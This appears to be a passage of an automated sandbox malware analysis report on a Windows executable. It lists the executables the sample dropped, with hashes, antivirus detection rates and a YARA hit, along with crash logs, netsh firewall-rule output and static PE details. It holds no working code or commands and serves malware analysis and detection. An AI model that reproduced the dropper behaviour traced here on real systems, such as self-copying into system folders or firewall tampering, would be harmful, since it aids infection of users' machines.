                                            MD5:C3E4A8A325B469EFC2F80337215A25E0
                                            SHA1:7D9597D4BA2C8F1AA5F9698D9AC14E33276F309A
                                            SHA-256:323F3D032F6993091B78A9A6710F627860E006AB94D4C6CBDD1E633309E27221
                                            SHA-512:56310025638F81BEA8509B8B3EA414E79F18F3EC41E9C026B941A463A59AB0C025876B1F4412371DD75922931C4EF1B8C4793EF4D51FE04E70A7946606C0EEF6
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.1.6.<./.P.i.d.>.......
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9CC.tmp.xml
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4685
                                            Entropy (8bit):4.477856827118253
                                            Encrypted:false
                                            SSDEEP:48:cvIwSD8zsLJgtWI9BtWSC8Bu8fm8M4Jd8qF0qv+q8vx8SbTFHOed:uITfl+cSN9JHvK3bhHOed
                                            MD5:F002D88880F6E1E2E1F1BDE33239C82B
                                            SHA1:5AA9856DE403B3B4FCE7154CD49B26FF9BE665FB
                                            SHA-256:78885C4292C966EED96C82261A11912DBD801F44BA2283A7BE01E016751A5452
                                            SHA-512:A64ADF5872BA2DBA40F80F1498000F96F2D310A9A582C84B1F3D01F1311372B69309BAAF0583111AE35880569203172D79EABFD4448C5AA253303084BC0FC4B5
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342360" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3D34.exe.log
                                            Process:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):700
                                            Entropy (8bit):5.346524082657112
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                            MD5:65CF801545098D915A06D8318D296A01
                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                            C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:modified
                                            Size (bytes):537088
                                            Entropy (8bit):5.840438491186833
                                            Encrypted:false
                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 46%
                                            • Antivirus: ReversingLabs, Detection: 89%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\6C37.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:MS-DOS executable
                                            Category:dropped
                                            Size (bytes):557664
                                            Entropy (8bit):7.687250283474463
                                            Encrypted:false
                                            SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                            MD5:6ADB5470086099B9169109333FADAB86
                                            SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                            SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                            SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 50%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\888A.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):7336385
                                            Entropy (8bit):7.993036026488077
                                            Encrypted:true
                                            SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                            MD5:AE6510D9815C44A818F722ECAE6844B8
                                            SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                            SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                            SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\9889.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3590144
                                            Entropy (8bit):7.997643531968
                                            Encrypted:true
                                            SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                            MD5:DA5C869D0ADE431230679390B5D183BF
                                            SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                            SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                            SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\A332.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):905216
                                            Entropy (8bit):7.399713113456654
                                            Encrypted:false
                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 34%
                                            • Antivirus: ReversingLabs, Detection: 77%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\A4DE.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):5.021094695416705
                                            Encrypted:false
                                            SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                            MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                            SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                            SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                            SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\A4DE.exe, Author: Florian Roth
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 35%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\BB8A.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):301056
                                            Entropy (8bit):5.192330972647351
                                            Encrypted:false
                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 46%
                                            • Antivirus: ReversingLabs, Detection: 77%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\CADF.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):7336391
                                            Entropy (8bit):7.993025428513385
                                            Encrypted:true
                                            SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                            MD5:CBE604877A46CEEBA112802BC17FFEF8
                                            SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                            SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                            SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\CCB2.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):324608
                                            Entropy (8bit):6.705560699768563
                                            Encrypted:false
                                            SSDEEP:6144:8cXfhxLWOCPRZa9XQ9XuxYADj5QTM44lq46Ue:8cXfhxKPZyK+x3NQN4l3Je
                                            MD5:043B44289E31BD54357F9A5C21833259
                                            SHA1:C042C1D364887BBF71B070C8DD6C66C08A818834
                                            SHA-256:8DC59F6481C6FE183ADAC2B720FFA276CC9F52D83521200B1A85BB5FF8E4046A
                                            SHA-512:AC7098ED6CC6922577D0C87F4E3BA6EF32973C1641C98B3C675EFBBC548A63346DE87A0026ADB850144B120604BB7B9982A69E1AA2859D0E0A3A0CCE08573756
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\D502.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):54272
                                            Entropy (8bit):4.125149292696976
                                            Encrypted:false
                                            SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                                            MD5:1B1E4286625BB189A526E910F2031C7B
                                            SHA1:650C0550F12C65D9841D10AB589FF39261018957
                                            SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                                            SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\D936.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):320512
                                            Entropy (8bit):6.685128709167328
                                            Encrypted:false
                                            SSDEEP:6144:BVMH4gQJqHQsl0yMo5DLaniwlnKh8MKxjDSmoETpqy:BVMY+lGiLlqKhexjpoEH
                                            MD5:9517CA2BC20EC061024C1209970CCD2E
                                            SHA1:5A3886349DEB4B7E6BA272304779C0C050BCDDCB
                                            SHA-256:07750C17A95131F145A3CD2418E0BBF031963537C7F2A1BCB4AEAB1D63EC8510
                                            SHA-512:51E289B0AC2F7D3083666B7707C415BE5EFC18CB8F4592288ADF768BF3990A6150A99F8B46FA283F74DE6D9556C9886303DA3E5D6A6B60E6BE0E086B2B230044
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\E3A9.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3576320
                                            Entropy (8bit):7.9976863291960605
                                            Encrypted:true
                                            SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                            MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                            SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                            SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                            SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\FB58.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):905216
                                            Entropy (8bit):7.399713113456654
                                            Encrypted:false
                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 34%
                                            • Antivirus: ReversingLabs, Detection: 77%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Local\Temp\krmdinzg.exe
                                            Process:C:\Users\user\AppData\Local\Temp\D936.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):10624000
                                            Entropy (8bit):3.8323533062805604
                                            Encrypted:false
                                            SSDEEP:12288:GVMY+lGiLlqKhexjpoEHQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ3:SIl0I4jq
                                            MD5:C8DE2E3F0DF5D9E1C126828B1444DBEA
                                            SHA1:568F6EDAFCFAA907DC199443324666D4F7BA6BFB
                                            SHA-256:B62D0D45AB934497D91566E94D2FA277A6726CEC40DD4D50CFEC6F898E43A538
                                            SHA-512:20BED97AB819B162DE12BCF7942B254339E5F263478781B272AF943DB03691EA8EC3F130AE97F72C0289DA0BA320929BEDFC900CAA4EDAB4B76FEB0661949014
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Roaming\jgdhbua
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):320512
                                            Entropy (8bit):6.688597828759442
                                            Encrypted:false
                                            SSDEEP:6144:zVMKim/rLWU5lbsbe8USFaX6EUNoO3Ez5B+D240obIIZfGd:zVMkfCeiFNbmOUFB+T0oXud
                                            MD5:31F0D01EE1FD6876668692791657D97E
                                            SHA1:A45A34A020AD13C9373BD14C45268004F505E1E1
                                            SHA-256:8FACF32116A5F68467C71032D3A207ABAA20FBCC56FCAB6A3DB650B4D30AD115
                                            SHA-512:7E737CFE1DB59AEF0BADA3184C059720EBB5744ADD725246E5A600E6CC1A3B6D0AA6B19EC6B90F5C1C1C0253D96B7A8C390594A9E0D14E35F45C9DBD1089917A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            C:\Users\user\AppData\Roaming\jgdhbua:Zone.Identifier
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:unknown
                                            Preview: [ZoneTransfer]....ZoneId=0
                                            C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe (copy)
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):10624000
                                            Entropy (8bit):3.8323533062805604
                                            Encrypted:false
                                            SSDEEP:12288:GVMY+lGiLlqKhexjpoEHQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ3:SIl0I4jq
                                            MD5:C8DE2E3F0DF5D9E1C126828B1444DBEA
                                            SHA1:568F6EDAFCFAA907DC199443324666D4F7BA6BFB
                                            SHA-256:B62D0D45AB934497D91566E94D2FA277A6726CEC40DD4D50CFEC6F898E43A538
                                            SHA-512:20BED97AB819B162DE12BCF7942B254339E5F263478781B272AF943DB03691EA8EC3F130AE97F72C0289DA0BA320929BEDFC900CAA4EDAB4B76FEB0661949014
                                            Malicious:true
                                            Reputation:unknown
                                            C:\Windows\appcompat\Programs\Amcache.hve
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1572864
                                            Entropy (8bit):4.237236426202636
                                            Encrypted:false
                                            SSDEEP:12288:FHIJeoqgeg5Fu/+BTQ9S1gTbMzZHogTtvN7r8XcfGa+2LXOU:lIJeoqgeg5I/+BjuM
                                            MD5:01943BF0494A56FD1AF5097441A3E2FC
                                            SHA1:4CF795A460778BD03A6A2749446779DDCDFCEC54
                                            SHA-256:862DA49FCA1E84DA44B0D9C45AD8508A03150FF8507F67620DB7AE11996AC6CB
                                            SHA-512:5779CCC50C91B4407A3E4DE37335B04E8D6DDC6276C5D75588E566975096EF057B444BD7AC22ACCD223AFF7FA79BB9FEF4475584DC3A76DD6C7DA54D33675DFC
                                            Malicious:false
                                            Reputation:unknown
                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):3.3450377575042998
                                            Encrypted:false
                                            SSDEEP:384:ybC5K5th4KgnVVeeDzei1NKZtjaT8GNwf3JC1M8I:i8KZg/eeDzesNYtjnGNwf2M8
                                            MD5:A2DE4322DAE6C2648B667D68B52FD8FF
                                            SHA1:B54F25C4DA3A3B828D3226F549164FDC540FF1B4
                                            SHA-256:F914769C1902117E0711746610EB7EE84F726B27CF539EC2B72214C58FD858EE
                                            SHA-512:3B53D772597F6654B54F9B8EC024DF9FAFD90BE702BB13FC3E1E95B257E165756388143DAD362F5CAA874DA6446180B6A42A287FBAC84D49FEE37628F3019259
                                            Malicious:false
                                            Reputation:unknown
                                            \Device\ConDrv
                                            Process:C:\Windows\SysWOW64\netsh.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):3773
                                            Entropy (8bit):4.7109073551842435
                                            Encrypted:false
                                            SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                            MD5:DA3247A302D70819F10BCEEBAF400503
                                            SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                            SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                            SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.688597828759442
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                            • Windows Screen Saver (13104/52) 0.13%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:ECD2MpEBSf.exe
                                            File size:320512
                                            MD5:31f0d01ee1fd6876668692791657d97e
                                            SHA1:a45a34a020ad13c9373bd14c45268004f505e1e1
                                            SHA256:8facf32116a5f68467c71032d3a207abaa20fbcc56fcab6a3db650b4d30ad115
                                            SHA512:7e737cfe1db59aef0bada3184c059720ebb5744add725246e5a600e6cc1a3b6d0aa6b19ec6b90f5c1c1c0253d96b7a8c390594a9e0d14e35f45c9dbd1089917a
                                            SSDEEP:6144:zVMKim/rLWU5lbsbe8USFaX6EUNoO3Ez5B+D240obIIZfGd:zVMkfCeiFNbmOUFB+T0oXud

                                            File Icon

                                            Icon Hash:c8d0d8e0f8e0f4e8

                                            Static PE Info

                                            General

                                            Entrypoint:0x41b4a0
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x60A4EF0B [Wed May 19 10:57:15 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:6801e04a0c2ca60ac2497c0d8723846b

                                            Entrypoint Preview

                                            Instruction
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            call 00007F6C9515778Bh
                                            call 00007F6C9514A706h
                                            pop ebp
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push FFFFFFFEh
                                            push 0043DA98h
                                            push 0041E680h
                                            mov eax, dword ptr fs:[00000000h]
                                            push eax
                                            add esp, FFFFFF94h
                                            push ebx
                                            push esi
                                            push edi
                                            mov eax, dword ptr [00440354h]
                                            xor dword ptr [ebp-08h], eax
                                            xor eax, ebp
                                            push eax
                                            lea eax, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], eax
                                            mov dword ptr [ebp-18h], esp
                                            mov dword ptr [ebp-70h], 00000000h
                                            mov dword ptr [ebp-04h], 00000000h
                                            lea eax, dword ptr [ebp-60h]
